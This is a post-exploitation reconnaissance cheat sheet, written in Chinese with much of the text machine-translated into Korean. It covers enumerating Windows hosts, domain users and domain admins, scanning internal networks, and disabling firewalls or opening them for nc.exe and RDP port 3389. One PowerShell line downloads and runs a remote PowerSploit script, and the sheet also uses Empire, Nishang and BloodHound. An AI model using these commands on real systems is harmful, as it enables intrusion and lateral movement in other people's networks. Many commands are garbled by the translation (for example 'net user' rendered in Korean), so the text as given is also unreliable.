제목 : 인트라넷 정보 수집

内网信息收集​

收集本机信息​

手动信息搜集​

查询网络配置信息​

1
ipconfig /모두
20200210104114.png-water_print

查询操作系统及软件的信息​

查询操作系统和版本信息​

1
2
SystemInfo | findstr /b /c:'os name ' /c:'os 버전'
SystemInfo | findstr /b /c:'os name ' /c:'os 버전'
20200210104425.png-water_print

查询系统体系结构​

1
echo %processor_architecture %
20200210104648.png-water_print

查看安装的软件、版本及路径等​

1
WMIC 제품은 이름, 버전을 얻습니다
20200210105032.png-water_print

1
PowerShell 'get -wmiobject -class win32_product | Select -Object -Property 이름, 버전 '
20200210105022.png-water_print

查询本机服务​

1
WMIC 서비스 목록 브리핑
20200210105233.png-water_print

查询进程列表​

1
2
작업 목록
WMIC 프로세스 목록 브리핑

查看启动程序信息​

1
WMIC 시작 GET 명령, 캡션
20200210105636.png-water_print

查看计划任务​

1
Schtasks /query /fo list /v

查看主机开机时间​

1
순 통계 워크 스테이션
20200210110134.png-water_print

查询用户列表​

1
2
3
4
순 사용자
순 지역 그룹 관리자
# 온라인 사용자 쿼리 :
쿼리 사용자 || Qwinsta

列出或断开本地计算机与所连接的客户端之间的会话​

1
순 세션

查询端口列表​

1
netstat -ano

查看补丁列表​

1
SystemInfo
20200210110618.png-water_print

1
wmic qfe 캡션, 설명, hotfixid, installedon
20200210110810.png-water_print

查询本机共享列表​

1
2
순 점유율
WMIC 공유 이름, 경로, 상태를 얻습니다
20200210110936.png-water_print

查询路由表及所有可用接口的ARP缓存表​

1
2
경로 인쇄
ARP -A

查询防火墙相关配置​

关闭防火墙​

Windows 2003 버전
1
Netsh Firewall Set Opmode 비활성화
Windows 2003 후반 버전
1
Netsh 방화벽은 AllProfiles 상태를 설정합니다
Windows 2003 이전의

修改防火墙配置​

버전
1
Netsh 방화벽 추가 허용 프로그램 C: \ nc.exe '허용 NC'활성화
Windows 2003 후반 버전
1
Netsh 방화벽 추가 규칙 이름='Pass NC'Dir=in Action=허용 프로그램='C: \ nc.exe'
지정된 프로그램을 연결할 수 있습니다
1
Netsh AdvFireWall 방화벽 추가 규칙 이름='허용 nc'dir=out action=허용 프로그램='c: \ nc.exe'
3389가 해제되도록하십시오
1
Netsh AdvFiRewall 방화벽 규칙 이름 추가='원격 데스크탑'프로토콜=tcp dir=localport=3389 action=허용

自定义防火墙日志的存储位置​

1
Netsh AdvfiRewall 방화벽 세트 CurrentProfile 로깅 파일 이름 'C: \ Windows \ Temp \ fw.log'

查看代理情况​

1
Reg Query 'hkey_current_user \ Software \ Microsoft \ Windows \ CurrentVersion \ 인터넷 설정'
20200210113955.png-water_print

查询并开启远程连接服务​

查看远程连接端口​

1
reg query 'hkey_local_machine \ system \ currentcontrolset \ control \ terminal server \ winstations \ rdp-tcp' /v portnumber
20200210115055.png-water_print

0xD3D는 10 진수로 3389로 변환됩니다

在Windows Server2003中开启3389端口​

1
WMIC PATH WIN32_TERMINALSERVICESETTING (__ class!='') 호출 SetallowTsConnections 1

在Windows Server2008和Windows Server2012中开启3389端口​

1
2
3
4
5
6
wmic /namespace: \\ root \ cimv2 \ terminalservices 경로 Win32_TerminalServiceSetting 어디 (__class!='') 호출 setAllowsConnections 1
wmic /namespace: \\ root \ cimv2 \ terminalservices 경로 Win32_TSGENERALESTTING (terminalName='rdp-tcp') 호출
setupuserauthenticationRequired 1
Reg Add 'hklm \ System \ CurrentControlset \ Control \ Terminal Server' /v fsinglesessionPerUser /t reg_dword /d 0 /f

自动化收集信息​

Empire下的主机信息搜集​

查看本机用户、域成员、密码设置时间、剪切板内容、系统基本信息、网络适配器信息、共享信息​

1
usemodule 상황 적_awareness/host/winenum
1
상황에 따라 _awareness/호스트/컴퓨터 데 테일

查询当前权限​

查询当前权限​

1
우와미
세 가지 상황 :
현지 일반 사용자
로컬 관리자
도메인 사용자

获取域 SID​

1
Whoami /All
20200211114616.png-water_print

查询指定用户的详细信息​

1
순 사용자 xxx /도메인
20200211114719.png-water_print

判断是否存在域​

使用 ipconfig 命令​

1
ipconfig /모두

查看系统详细信息​

1
SystemInfo

查询当前登录域及用户信息​

1
순 구성 워크 스테이션
20200211114956.png-water_print

判断主域​

1
순 시간 /도메인
20200211115058.png-water_print

명령을 실행 한 후에는 세 가지 상황이 있습니다.
도메인이 존재합니다 : 현재 도메인 사용자가 아닙니다
시스템 오류가 발생했습니다
도메인이 존재합니다. 현재 사용자는 도메인 사용자입니다.
위의 그림에서 볼 수 있듯이
현재 네트워크 환경은 작업 그룹입니다
도메인 컨트롤러를 찾을 수 없습니다

探测内网存活主机​

利用 NetBIOS 快速探测内网​

1
nbtscan.exe 192.168.1.0/20

利用 ICMP 协议快速探测内网​

1
(1,1,254)에서 /l %i의 경우 @ping -w 1 -n 1 192.168.1. %i | findstr 'ttl='

通过 ARP 扫描探测内网​

arp-scan工具​

1
arp.exe -t 192.168.1.0/20

Empire 中的 ARPscan 模块​

1
usemodule 상황 적_awareness/네트워크/아프 스캔

Nishang 中的 Invoke-ARPScan.ps1 脚本​

1
PowerShell.exe -exec -command '{import -module c: \ windows \ temp \ invoke-arpscan.ps1; Invoke -Arpscan -cidr 192.168.1.0/24}'C: \ Windows \ temp \ log.txt

扫描内网端口​

metasploit 端口扫描​

1
보조/스캐너/포트 스캔/TCP

PowerSploit 的 Invoke-portscan.ps1 脚本​

1
powerShell.exe -nop -exec bypass -c 'iex (new-Objectnet.webclient) .downloadString ('https://raw.githubusercontent.com/powershellmafia/powersploit/master/recon/invoke-portscan.ps1 '); invoke-portscan -HOSTS 192.168.1. -Ports '445,1433,8080,3389,80'-oA C: \ Windows \ temp \ rex.txt '

Nishang 的 Invoke-PortScan 模块​

1
Invoke -PortScan -StartAddress 192.168.250.1- 엔드 드레스 192.168.250.255 -ResolveHost

端口 banner 信息​

20200212095532.png-water_print

收集域内基础信息​

查询域​

1
순 뷰 /도메인

查询域内所有计算机​

1
NET View /Domain:hacke

查询域内所有用户列表​

1
순 그룹 /도메인

查询域内所有成员计算机列表​

1
NET 그룹 '도메인 컴퓨터 /도메인

查询域密码信息​

1
순 계정 /도메인

获取域信任信息​

1
nltest /domain_trusts

查找域控制器​

查看域控制器的机器名​

1
nltest /dclist: 도메인 이름

查看域控制器的主机名​

1
nslookup -type=srv _ldap._tcp.

查看当前时间​

1
순 시간 /도메인

查看域控制器组​

1
Net Group 'Domain Controllers' /Domain
1
NETDOM 쿼리 PDC

获取域内的用户和管理员信息​

查询所有域用户列表​

向域控服务器进行查询​

1
순 사용자 /도메인

获取域内用户的详细信息​

1
WMIC userAccount get /모두

查看存在的用户​

1
dsquery 사용자

查询本地管理员组用户​

1
순 지역 그룹 관리자

查询域管理员用户​

查询域管理员用户​

1
Net Group 'Domain Admins' /Domain

查询管理员用户​

1
Net Group 'Enterprise Admins' /Domain

定位域管理员​

常用工具​

pslogon.exe​

1
pslogon.exe \\ dc

PVEFindADUser.exe​

1
pvefindaduser.exe -current

netview.exe​

nmap的脚本​

도메인 제어에 대한 정보를 수집하면 호스트 정보, 사용자 및 기타 정보를 얻을 수 있습니다.
smb-eenum-sessions.nse
특정 호스트에 대한 권한을 얻지 만 더 많은 도메인 사용자 정보를 얻을 수 없습니다.
smb-enum-users.nse
원격 호스트의 공유 디렉토리를 반복하십시오
smb-eenum-shares.nse
호스트 원격 프로세스의 횡단
smb-enum-process.nse
호스트 운영 체제, 컴퓨터 이름, 도메인 이름, 도메인 포레스트 이름, NetBios 기계 이름, 작업 그룹, 시스템 시간 등에 대한 정보
SMB-OS- 발견

powerview脚本​

IntealthuserHunter를 호출합니다
호출-우스 헌터

Empire 的 user_hunter模块​

1
usemode 상황에 따라 _awareness/network/powerview/user_hunter

查找域管进程​

本机检查​

获取域管理员列表​

1
Net Group 'Domain Admins' /Domain

列出本机的所有进程及进程用户​

1
작업 목록 /v

查询域控的域用户会话​

查询远程系统中运行的任务​

먼저 도메인 관리자 그룹에서 도메인 관리자 목록을 수집하십시오.
그런 다음 대상 IP를 ips.txt에 추가하고 수집 된 도메인 관리자 목록을 Names.txt 파일에 추가하십시오.
1
2
/f %i in (ips.txt) do @echo [+] %i @tasklist /v /s %i /u user /p password 2nul output.txt
/f %n in (names.txt) do @type output.txt | findstr %n nul echo [!] %n이 %I PASIVE에 대한 프로세스를 실행하는 것으로 밝혀졌습니다.

扫描远程系统的 NetBIOS 信息​

먼저 도메인 관리자 그룹에서 도메인 관리자 목록을 수집하십시오.
그런 다음 대상 IP를 ips.txt에 추가하고 수집 된 도메인 관리자 목록을 Admins.txt` 파일에 추가하십시오.
1
(ips.txt) do @echo [+] do @echo [+] chewing %i nbtstat -a %i 2nul nbsessions.txt for /f %n in (admins.txt) do @type nbsessions.txt | findstr /i %n nul echo [!] %n이 %i에 로그인 한 것으로 밝혀졌습니다.

BloodHound 工具​

1
양조 서비스 시작 Neo4J 시작

收集脚本​

1
sharphound.exe -c 모두
 
뒤로
상단